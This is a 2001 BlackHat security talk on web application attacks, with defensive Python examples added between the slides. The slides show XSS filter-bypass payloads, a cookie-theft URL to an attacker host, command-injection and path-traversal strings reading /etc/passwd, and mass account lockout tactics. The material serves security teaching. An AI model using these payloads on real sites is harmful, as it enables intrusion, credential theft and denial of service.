Web Application Security: The Land that Information Security Forgot

Today, the vast majority of those within information security have heard about web application security and possess at least a vague understanding of the risks involved. However, the multitude of attacks which make this area of security important, for the most part, go undocumented, unexplained and misunderstood. As a result, our web applications become undefended and at the mercy of a determined attacker. In order to gain a deeper understanding of the threats, witnessing these attacks first hand is essential.

Make no mistake, insecure and unprotected web applications are the fastest, easiest, and arguably the most utilized route to compromise networks and exploit users. What's worse is that conventional security measures lack the proper safeguards and offer little protection, resulting in nothing more than a "false sense of security".

This discussion will cover theory surrounding some of the more dangerous web application attacks, examples of the attacks in action, and possible countermeasures.

Founder and chairman of WhiteHat Security, and former information security officer with Yahoo!. As information security officer at Yahoo!, Jeremiah designed, audited, and penetration-tested the huge company's web applications, which demand the highest security. During his past 5 years of employment, Jeremiah has been researching and applying information security with special emphasis on prevention of web application sabotage. Grossman has presented "Web Application Security" talks at many security conventions such as DefCon, the Air Force and Technology Conference, ToorCon, and others. Jeremiah is a lead contributor to the "Open Web Application Security Project" (www.owasp.com) and is considered to be among the foremost web security experts.
BlackHat Amsterdam 2001
Web Application Security: The Land that Information Security Forgot.
Presenter: Jeremiah Grossman
Copyright 2001 WhiteHat Security All Rights Reserved
Topics
Web Application Security Landscape
Common Web Application Security Mistakes
Web Application Attack Methodologies
2001 © WhiteHat Security, Inc.
Topics
Web Application Attack Methodologies
Information & Discovery
Input Manipulation & Parameter Tampering
Cross-Site Scripting
System Mis-Configuration
But Why!?
• Easiest way to compromise hosts, networks and users.
• Widely deployed.
• No logs! (A POST request's payload never reaches the access log.)
• Incredibly hard to defend against or detect.
• Most don’t think of locking down web applications.
• Intrusion detection is a joke.
• Firewall? What firewall? I don’t see no any firewall.
• Encrypted transport layer does nothing.
• Best of all, no one is looking anyway.
How much easier can it get!?
Oh right.
Unicode
Web Application: The Simple Definition
A web application or web service is a software application that is accessible using a web browser or HTTP(S) user agent.
Web Security Layers
The Implementation
Entertainment: Message Boards, WebMail, Guest Books, Voting Polls
E-Commerce: Shopping, Auctions, Banking, Stock Trading
Just Plain Crazy: Printers, PDAs, Cell Phones, System Configuration, .NET/Passport
Firewall
Common Web Application Security Mistakes
Trusting Client-Side Data
DO NOT TRUST CLIENT-SIDE DATA!
Trusting Client-Side Data is #1 cause of vulnerabilities.
Identify all input parameters that trust client-side data.
Trusting Client-Side Data
The Level of Trust: E-Commerce Shopping
Numbers
<input type=hidden value=2149.37>  ->  2149.00   Too much for a new VAIO!
<input type=hidden value=2.99>  ->  2.99   Now On Sale!
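The hidden-field price edit above, as an added example (not code from the original slides): a checkout that trusts the client's price and quantity next to one that re-derives both server-side. The catalogue, the SKU names, the prices and the form field names are assumptions made for the example.

```python
# Added example, not from the original slides: a checkout that trusts the
# hidden price field beside one that re-derives the price server-side.
# The catalogue, SKUs, prices and form layout below are assumptions.
from decimal import Decimal

# Assumed server-side source of truth; the client never gets to set these.
CATALOG = {
    "VAIO-505": Decimal("2149.37"),
    "MOUSEPAD": Decimal("2.99"),
}

def total_trusting_client(form: dict) -> Decimal:
    """Vulnerable: price and quantity are read straight from hidden fields.

    Edit <input type=hidden name=price value=2149.37> to 2.99 (or set
    qty=-1) in the saved page, resubmit, and the server bills that amount.
    """
    return Decimal(form["price"]) * int(form["qty"])

def total_server_side(form: dict) -> Decimal:
    """Hardened: the client chooses only *which* item and *how many*.

    The price comes from CATALOG, qty is parsed and range-checked, and any
    other field the client sends (price included) is simply ignored.
    """
    sku = form.get("sku", "")
    if sku not in CATALOG:
        raise ValueError("unknown sku")
    try:
        qty = int(form.get("qty", ""))
    except ValueError:
        raise ValueError("qty is not an integer") from None
    if not 1 <= qty <= 99:
        raise ValueError("qty out of range")   # blocks negative/zero qty
    return CATALOG[sku] * qty

def order_is_acceptable(form: dict) -> bool:
    """True only when the hardened path accepts the submission."""
    try:
        total_server_side(form)
    except ValueError:
        return False
    return True

if __name__ == "__main__":
    # Constructed tampered submission: right SKU, attacker-supplied price.
    tampered = {"sku": "VAIO-505", "price": "2.99", "qty": "1"}
    print("trusting client:", total_trusting_client(tampered))   # 2.99
    print("server-side:    ", total_server_side(tampered))       # 2149.37
```

The point of the hardened version is not the range check but that the hidden price field has no influence at all: the only thing the client is allowed to pick is a key into server-held data.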
Trusting Client-Side Data
The Level of Trust: Searches/Queries/Templates
Path
http://foo.com/cgi?val=string&file=/html/name.db
Or better yet…
http://www.foo.com/cgi?string=root&file=../../../../../etc/passwd
Unescaped Special Characters
! @ $ % ^ & * ( ) -_ + ` ~ \ | [ ] { } ; : ' " ? / , . > <
Check for: unescaped special characters within input strings.
HTML Character Filtering
Proper handling of special characters
> => &gt;
< => &lt;
" => &quot;
& => &amp;
Null characters should all be removed. %00
More mistakes…
SUID (Does a web application really need root?)
Authentication mechanisms using technologies such
as JavaScript or ActiveX.
Lack of re-authenticating the user before issuing new
passwords or performing critical tasks.
Hosting of uncontrolled data on a protected domain.
Information & Discovery
Spidering/Site Crawling
Identifiable Characteristics
Errors and Response Codes
File/Application Enumeration
Network Reconnaissance
Spidering/Site Crawling
Site Map
Service Map
Documentation
Hidden Services
CGI's and Forms
Email addresses
Tools: WGET http://www.gnu.org/software/wget/wget.html
Identifiable Characteristics
Comment Lines
URL Extensions
Meta Tags
Cookies
Client-Side scripting languages
An enormous wealth of information about process flows, debug commands, system types and configurations.
Error and Response Codes
HTTP Response Headers (e.g. Server: IBM/Apache 1.3.19)
Cookie Characteristics
Error Messages
Exception Messages (Java / SQL)
404 Error Pages
Failed Login
Locked Account
Database or file non-existent
File/Application Enumeration
Commonly referred to as “forced browsing” or “CGI Scanning”.
Directory Browsing Index Listings
http://www.foo.com/dir3/dir2/dir1/file.html
Try:
http://www.foo.com/dir3/dir2/dir1/
http://www.foo.com/dir3/dir2/
http://www.foo.com/dir3/
Tools: Whisker
http://www.wiretrip.net/
File/Application Enumeration
Sample Files
Template Directories
Temp or Backup files
Hidden Files
Vulnerable CGIs
Network Reconnaissance
WHOIS
ARIN http://www.arin.net/whois/index.html
Port Scan (Nmap)http://www.insecure.org/nmap/index.html
Traceroute
Ping Scan (Nmap or HPING) http://www.hping.org/
NSLookup/ Reverse DNS
DNS Zone Transfer (DIG)
OS Finger Printing (Nmap or Xprobe)
Input Manipulation / Parameter Tampering: "Twiddling Bits."
Cross-Site Scripting
Filter-Bypass Manipulation
OS Commands
Meta Characters
Path/Directory Traversal
Hidden Form Field Manipulation
HTTP Headers
Cross-Site Scripting
Bad name given to a dangerous security issue.
The attack targets the user of the system rather than the system itself.
Outside client-side code executing within the user's web environment with the same level of privilege as the hosted site.
Client-Side Scripting Languages
DHTML (HTML, XHTML, HTML x.0): Opens all the doors.
JavaScript (1.x): Browser/DOM Manipulation
Java (Applets): Malicious Applets
VBScript: Browser/DOM Manipulation
Flash: Dangerous Third-Party Interactivity
ActiveX: Let me count the ways…
XML/XSL: Another Door Opener
CSS: Browser/DOM Manipulation
Accessing the DOM & Outside the DOM
Document Object Model (DOM)
Client-side languages possess an enormous amount of power to access and manipulate the DOM within a browser.
Complex and diverse interconnections increase the level of access within the DOM.
That increased level of access means reading and modifying DOM data ranging from background colors, to a file on your system, and beyond to executing system calls.
Authentication/Authorization: “Hand in the cookie jar.”
Cookies are restricted to domains (.acme.com). Uncontrolled data on a restricted domain can access the cookie data.
JavaScript expression: document.cookie
Ways to get it off the site: window.open, document.img.src, hidden form submit
www.attacker.com/cgi-bin/cookie_thieft.pl?COOKIEDATA
Cookie data is passed to a CGI through a GET request to an off-domain host.
The Scenarios
Trick a user to re-login to a spoofed page
Compromise authentication credentials
Load dangerous or malicious ActiveX
Re-Direct a user or ALL users
Crash the machine or the browser
CSS Danger: “The Remote Launch Pad.” (CSS here is the deck's abbreviation for cross-site scripting, not Cascading Style Sheets.)
Successfully CSS a user via a protected domain.
Utilizing a client-side utility (JavaScript, ActiveX, VBScript, etc.), exploit a browser hole to download a trojan/virus.
User is unknowingly infected/compromised within a single HTTP page load.
ActiveX Netcat anyone?
Dangerous HTML: “HTML Bad”
<APPLET> Malicious Java Applications
<BODY> Altering HTML Page Characteristics
<EMBED> Embedding Third-Party Applications (Flash, etc.)
<FRAME> Directly calling in other uncontrolled HTML
<FRAMESET> Directly calling in other uncontrolled HTML
<HTML> Altering HTML Page Characteristics
<IFRAME> Directly calling in other uncontrolled HTML
<IMG> SRCing protocol attacks and other abuses
<LAYER> Directly calling in other uncontrolled HTML
<ILAYER> Directly calling in other uncontrolled HTML
<META> META Refreshes (Client-Side Redirects)
<OBJECT> ActiveX (Nuff Said)
<SCRIPT> JavaScript/VBScript Loading
<STYLE> Style Sheet and Scripting Alterations
Dangerous Attributes: “Attributes Bad”
ATTRIBUTE DANGER LIST (any HTML tag that has these attributes)
STYLE
SRC
HREF
TYPE
Filter Bypassing: "JavaScript is a Cockroach"
There are all kinds of input filters web applications implement to sanitize data.
This section will demonstrate many known ways input filters can be bypassed to perform malicious functions such as cross-site scripting, browser hijacking, cookie theft, and others.
Client-Side Scripting (CSS) attacks require the execution of JavaScript, Java, VBScript, ActiveX, Flash or some others.
We will be assuming that these web applications accept HTML, at least in a limited sense.
Testing the Filters
Submit all the raw HTML tags you can find, and then view the output results.
Combine HTML with tag attributes, such as SRC, STYLE, HREF and OnXXX (JavaScript event handlers).
This will show what HTML is allowed, what the changes were, and possibly what dangerous HTML can be exploited.
SCRIPT TAG
Description: The script tag is the simplest form of inputting JavaScript.
Exploit: <SCRIPT>alert('JavaScript Executed');</SCRIPT>
Solution: replace all "script" tags.
SRCing JavaScript Protocol
Description: The JavaScript protocol will execute the expression entered after the colon. Netscape tested.
Exploit: <IMG SRC="javascript:alert('JavaScript Executed');">
Solution: Replace "javascript" strings in all SRC & HREF attributes in HTML tags with another string.
Example: <IMG SRC="java_script:alert('JavaScript Executed');"> will render this script useless.
Further Information: Any HTML tag with a SRC attribute will execute this script on page load or on link activation.
As further protocol pattern matching, the keywords "livescript" and "mocha" (Netscape code names) must also be replaced, for they hold the same possibilities.
SRCing JavaScript Protocol w/ HTML Entities
Description: As another derivative of the previous, decimal HTML entities within these strings can cause filter bypass.
Exploit: <IMG SRC="javasc&#09;ript:alert('JavaScript Executed');">
Replacing the entity with &#10; &#11; &#12; or &#13; will also succeed.
Hex instead of decimal HTML entities will also bypass input filters and execute:
<IMG SRC="javasc&#x09;ript:alert('JavaScript Executed');">
As will placing multiple zeros in front:
<IMG SRC=javasc&#0000009;ript:alert('JavaScript Executed');>
Solution: Decode these entities within the string, then do your further pattern matching.
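The two SRCing slides above (plain javascript: and the entity-encoded variants) as an added example, not code from the original deck: a filter that does what the first slide says, replace the literal string "javascript", tried against the payload variants the second slide describes, beside a filter that decodes entities and strips the control characters a browser ignores before it looks at the scheme. The payload strings, the `#blocked` placeholder and the scheme list are constructed for the example; `vbscript:` is included alongside the slide's `livescript` and `mocha` because it is the same class of scheme.

```python
# Added example, not from the original slides: why "replace javascript with
# java_script" is beaten by entity-encoded payloads, and what a filter has
# to do instead. All payload strings and the #blocked placeholder are
# constructed for this example.
import html
import re

# Characters browsers skip inside a URL scheme, i.e. the entities the slide
# lists (&#09; &#10; &#11; &#12; &#13;) plus NUL.
_SKIPPED = dict.fromkeys(map(ord, "\t\n\x0b\x0c\r\x00"))

# Schemes that execute code when a browser follows a SRC/HREF to them.
SCRIPT_SCHEMES = ("javascript:", "livescript:", "mocha:", "vbscript:")

# A SRC or HREF attribute: double-quoted, single-quoted or bare value.
_ATTR_RE = re.compile(
    r"""(src|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE)

def _attr_value(m: re.Match) -> str:
    return m.group(2) or m.group(3) or m.group(4) or ""

def naive_filter(markup: str) -> str:
    """The slide's fix applied literally: rewrite the string 'javascript'."""
    return re.sub("javascript", "java_script", markup, flags=re.IGNORECASE)

def normalize(value: str) -> str:
    """Decode entities (decimal, hex, leading zeros) and drop the control
    characters a browser ignores, so the filter sees what the browser sees."""
    return html.unescape(value).translate(_SKIPPED)

def src_is_dangerous(value: str) -> bool:
    """True if a SRC/HREF value resolves to a script-executing scheme."""
    return normalize(value).strip().lower().startswith(SCRIPT_SCHEMES)

def robust_filter(markup: str) -> str:
    """Neutralize every SRC/HREF whose *normalized* value is a script scheme."""
    def fix(m: re.Match) -> str:
        if src_is_dangerous(_attr_value(m)):
            return f'{m.group(1)}="#blocked"'
        return m.group(0)
    return _ATTR_RE.sub(fix, markup)

def bypasses_naive(payload: str) -> bool:
    """Does the naive filter leave behind a SRC the browser would still run?"""
    m = _ATTR_RE.search(naive_filter(payload))
    return m is not None and src_is_dangerous(_attr_value(m))

# Constructed from the variants described on the slide.
PAYLOADS = [
    '<IMG SRC="javascript:alert(1)">',             # plain: naive catches it
    '<IMG SRC="javasc&#09;ript:alert(1)">',        # decimal entity
    '<IMG SRC="javasc&#x09;ript:alert(1)">',       # hex entity
    '<IMG SRC="javasc&#0000009;ript:alert(1)">',   # leading zeros
    '<IMG SRC="jav&#10;ascript:alert(1)">',        # line feed
    '<IMG SRC=" JaVaScRiPt:alert(1)">',            # case and leading space
]

if __name__ == "__main__":
    for p in PAYLOADS:
        verdict = "BYPASSES naive" if bypasses_naive(p) else "caught by naive"
        print(f"{verdict:16} | robust -> {robust_filter(p)}")
```

Only the plain payload is caught by the literal replace; every entity-encoded form sails through and still reads `javascript:` once the browser has decoded it. The robust filter works because it normalizes first and then decides on the scheme, which is the slide's "decode these entities, then pattern match" put into code.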
AND CURLY
Description: Obscure Netscape JavaScript execution line. Exact syntax is needed to execute.
Exploit: <IMG SRC="&{alert('JavaScript Executed')};">
Solution: <IMG SRC="XXalert('JavaScript Executed')};"> or something similar will nullify the problem.
Style Tag Conversion
Description: Turn a style tag into a JavaScript expression.
Exploit: <style TYPE="text/javascript">JS EXPRESSION</style>
Solution: Replace the "javascript" string with "java_script" and all should be fine.
Exploit: Import dangerous CSS. <STYLE type=text/css>@import url(http://server/very_bad.css);</STYLE>
Solution: Filter and replace the "@import".
Exploit: Import a JavaScript expression through a style tag (IE hole). <style TYPE="text/css">@import url(javascript:alert('JavaScript Executed'));</style>
Solution: Again, filter and replace the "@import" and the "javascript:" just to be safe.
Using CSS
Click to Execute: User must click on a link to execute the script. (Search fields, 404 errors, etc.)
http://www.foo.com/NOFILE/<SCRIPT>alert('JavaScript Launched');</SCRIPT>
Mass Injection: All users viewing the page execute the script. (Guest books, message boards)
Post a JavaScript onto a board: Message <SCRIPT>alert('JavaScript Launched');</SCRIPT>
Using CSS
Directed Injection: As soon as the user loads the page, the script executes. (WebMail, HTML mail, messaging)
Send an email with… HELLO <SCRIPT>alert('JavaScript Launched');</SCRIPT>
Holding the Door Open: (Feedback, profile pages, anything persistent…)
Load an HTML page with sourced scripts.
<LAYER SRC="javascript.js"></LAYER>
Twiddling Bits
OS Commands
Meta Characters
Path/Directory Traversal
Power of the Semi-Colon: piping input to the command line.
OS Commands: http://foo.com/[email protected]
Append: http://foo.com/[email protected];+sendmail+/etc/passwd
Piping: http://foo.com/[email protected]+|+less
Re-Direct: http://foo.com/[email protected]+>+/
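The sendmail CGI on the slide rebuilt two ways, as an added example that is not code from the original deck. The vulnerable form builds one string and hands it to the shell, which is why `;`, `|` and `>` in the email parameter become new commands; the hardened form validates the address and never invokes a shell. The `/usr/sbin/sendmail` path, the address regex and the sample addresses are assumptions.

```python
# Added example, not from the original slides: the slide's sendmail CGI
# rebuilt two ways. The vulnerable form hands one string to /bin/sh, so a
# ';', '|' or '>' in the email parameter starts a new command; the hardened
# form validates the address and never invokes a shell. The sendmail path,
# the address regex and the sample addresses are assumptions.
import re
import shlex
import subprocess

SENDMAIL = "/usr/sbin/sendmail"    # assumed MTA path

def vulnerable_command(email: str) -> str:
    """The string os.system() would hand to the shell in the vulnerable CGI."""
    return f"{SENDMAIL} -t {email}"

def shell_tokens(email: str) -> list:
    """Tokenize vulnerable_command(email) the way /bin/sh does, so that an
    injected ';', '|' or '>' shows up as its own token followed by the
    attacker's command."""
    lexer = shlex.shlex(vulnerable_command(email), posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)

def injected_commands(email: str) -> list:
    """Everything the shell would run *after* the first control operator."""
    toks = shell_tokens(email)
    for i, t in enumerate(toks):
        if t in (";", "|", "||", "&&", "&", ">", ">>", "<"):
            return toks[i + 1:]
    return []

# Deliberately strict: one local part, one dotted domain, nothing the shell
# or sendmail's option parser could care about.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")

def safe_argv(email: str) -> list:
    """Hardened: validate, then build an argv list (no shell involved)."""
    if not EMAIL_RE.fullmatch(email):
        raise ValueError("rejected recipient")
    if email.startswith("-"):
        # A leading '-' passes the regex but would be parsed by sendmail as
        # an option (e.g. -X<logfile>), so reject it explicitly.
        raise ValueError("rejected recipient")
    return [SENDMAIL, email]

def address_is_acceptable(email: str) -> bool:
    try:
        safe_argv(email)
    except ValueError:
        return False
    return True

def send(email: str, message: str) -> None:
    """Run the MTA with argv, never with a shell string."""
    subprocess.run(safe_argv(email), input=message.encode(), check=True)

if __name__ == "__main__":
    attack = "user@foo.com; sendmail /etc/passwd"   # constructed, per the slide
    print(shell_tokens(attack))
    print("injected:", injected_commands(attack))
    print("safe argv:", safe_argv("user@foo.com"))
```

Two separate defences are at work: the argv form removes the shell, so metacharacters lose their meaning, and the explicit leading-`-` check covers option injection, which the shell-free form alone does not stop.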
Power of Special Characters: piping input to the command line.
Meta Characters: http://foo.com/app.cgi?list=file.txt
Altered: http://foo.com/app.cgi?list=*
Power of the Dots and Slashes: piping input to the command line.
Path/Directory Traversal: http://foo.com/app.cgi?directory=/path/to/data
DotDot Slash: http://foo.com/app.cgi?dir=path/to/data../../../../etc/passwd
Dot Slash: http://foo.com/app.cgi?dir=path/to/data../../../../etc/././passwd
Double DotDot Slash: http://foo.com/app.cgi?dir=path/to/data....//....//....//etc/passwd
More Filter Bypassing
Method Alteration (HEAD, PUT, POST, GET, etc.)
URL Encode
http://www.foo.com/cgi?value=%46%72%68%86
Null Characters
http://www.foo.com/cgi?value=file%00.html
More…
Alternate Case, Unicode, String Length, Multi-Slash, etc.
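The traversal variants from the Dots and Slashes slide, the `file=../../../../../etc/passwd` example earlier in the deck, and the URL-encode and null-character bypasses above, as one added example that is not code from the original deck. It shows why stripping `../` fails against `....//` and why the decision has to be made on where the final path lands. The document root and request strings are assumptions.

```python
# Added example, not from the original slides: a naive "strip ../" filter
# beside a resolver that decides by where the final path actually lands.
# It covers the variants the slides list (../, ./, ....//), URL-encoded and
# double-encoded dots, and the file%00.html null-byte trick. DOCROOT and
# the request parameters are assumptions.
import posixpath
from urllib.parse import unquote

DOCROOT = "/var/www/html"   # assumed document root, no trailing slash

def naive_clean(param: str) -> str:
    """The tempting one-liner: delete every '../' and move on.

    One pass over '....//' leaves '../' behind, which is exactly the
    'Double DotDot Slash' payload on the slide.
    """
    return param.replace("../", "")

def resolve_under_root(param: str, root: str = DOCROOT):
    """Return the absolute path for `param`, or None if it escapes `root`.

    Order matters: decode first (twice, to catch %252e double encoding),
    reject NUL before the string reaches a C-level open(), normalize, and
    only then compare against the root.
    """
    decoded = unquote(unquote(param))
    if "\x00" in decoded:
        return None                      # file%00.html would truncate in C
    full = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if full != root and not full.startswith(root + "/"):
        return None
    return full

def is_safe_request(param: str) -> bool:
    return resolve_under_root(param) is not None

if __name__ == "__main__":
    requests = [  # constructed from the slide's traversal payloads
        "path/to/data/../../../../etc/passwd",
        "path/to/data/../../../../etc/././passwd",
        "....//....//....//etc/passwd",
        "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
        "%252e%252e%252fetc/passwd",
        "file%00.html",
        "path/to/data/index.html",
    ]
    for r in requests:
        print(f"{r:42} naive->{naive_clean(r):28} resolved->{resolve_under_root(r)}")
```

Note that `....//....//` is accepted by the resolver: after normalization it points at a harmless path under the root, and the filter's job is containment, not pattern recognition. The second `unquote` is there only because the web server has usually decoded once already; if your server does not, decode exactly as many times as it does, since the prefix comparison is the real control.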
More bits…
Hidden Form Field Manipulation
HTTP Headers (Cookies, Referers…)
System Mis-Configurations: “patches, patches, and more patches…"
Vendor Patches
Default Accounts
Check:
Web server permissions by directory browsing
Software version from discovery
Known default accounts in commercial platforms
BugTraq
Anonymous FTP open on web server
Other Dirty Tricks: “Abuse can be far more time consuming, costly and dangerous”
Mass Account Lockout: attacks against brute-force defenses
3 Time Failure Lock-Out Rule
Purposely fail the 3 attempts against thousands of accounts. If the login is sequential, even better.
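Detection logic for the mass-lockout trick above, as an added example that is not code from the original deck, run over constructed login-audit lines. A per-account lockout rule is exactly what the attacker weaponizes, so the detector keys on the source instead: one source locking many distinct accounts in a short window, with a bonus check for sequential account names. The log format, the thresholds and the addresses are assumptions about a hypothetical site.

```python
# Added example, not from the original slides: detection logic for the
# mass-lockout trick, run over constructed login-audit lines. The log
# format, the 3-failure lockout rule and the alert thresholds are
# assumptions about a hypothetical site, not a real product's format.
from collections import defaultdict
from datetime import datetime, timedelta

LOCKOUT_FAILURES = 3                 # the slide's "3 time failure" rule
WINDOW = timedelta(minutes=5)        # look-back for the mass-lockout alert
MASS_THRESHOLD = 5                   # distinct accounts one source may lock

# Constructed audit trail: an ordinary user mistyping, then one source
# burning three failures each on acct1000..acct1005 in a few seconds.
SAMPLE_LOG = [
    "2001-11-21T10:00:00 LOGIN_FAIL user=alice src=192.0.2.5",
    "2001-11-21T10:00:07 LOGIN_FAIL user=alice src=192.0.2.5",
    "2001-11-21T10:00:15 LOGIN_FAIL user=alice src=192.0.2.5",
    "2001-11-21T10:00:40 LOGIN_OK   user=bob   src=192.0.2.9",
] + [
    f"2001-11-21T10:01:{i:02d} LOGIN_FAIL user=acct{1000 + i // 3} src=10.9.8.7"
    for i in range(18)
]

def parse(line: str):
    """Return (timestamp, event, user, src), or None for lines we ignore."""
    parts = line.split()
    if len(parts) < 4 or parts[1] not in ("LOGIN_FAIL", "LOGIN_OK"):
        return None
    fields = dict(p.split("=", 1) for p in parts[2:] if "=" in p)
    return datetime.fromisoformat(parts[0]), parts[1], fields["user"], fields["src"]

def lockouts(lines):
    """Yield (timestamp, user, src) each time an account crosses the
    failure threshold, i.e. each time the site would lock it."""
    failures = defaultdict(int)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, event, user, src = rec
        if event == "LOGIN_OK":
            failures[user] = 0
            continue
        failures[user] += 1
        if failures[user] == LOCKOUT_FAILURES:
            yield ts, user, src

def detect_mass_lockout(lines):
    """Map src -> set of accounts it locked, for sources that locked at
    least MASS_THRESHOLD distinct accounts inside one WINDOW."""
    by_src = defaultdict(list)
    for ts, user, src in lockouts(lines):
        by_src[src].append((ts, user))
    alerts = {}
    for src, events in by_src.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            inside = {u for t, u in events[i:] if t - start <= WINDOW}
            if len(inside) >= MASS_THRESHOLD:
                alerts[src] = alerts.get(src, set()) | inside
    return alerts

def looks_sequential(users) -> bool:
    """True if the locked names share a prefix and differ only by
    consecutive trailing numbers (the slide's 'sequential login' case)."""
    prefixes, nums = set(), []
    for u in users:
        stem = u.rstrip("0123456789")
        tail = u[len(stem):]
        if not tail:
            return False
        prefixes.add(stem)
        nums.append(int(tail))
    nums.sort()
    return len(prefixes) == 1 and len(nums) > 1 and \
        nums == list(range(nums[0], nums[0] + len(nums)))

if __name__ == "__main__":
    for src, users in detect_mass_lockout(SAMPLE_LOG).items():
        seq = " (sequential account names)" if looks_sequential(users) else ""
        print(f"ALERT mass lockout from {src}: {sorted(users)}{seq}")
```

The alert fires for `10.9.8.7` and not for alice's three typos, which is the distinction a per-account counter cannot make. The same per-source view is what a throttling rule should key on, so that the attacker's source is slowed down instead of the victims' accounts being locked.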
Other Dirty Tricks: “Abuse can be far more time consuming, costly and dangerous”
Brute Force/Page Sequencing: attacks against process flow
Use 1 or 2 pieces of data to get the rest.
Slowly brute force the process for data aggregation.
Thank YouBlackHat and Attendees
Questions?
Jeremiah [email protected]
WhiteHat Security
All presentation updates will be available on www.whitehatsec.com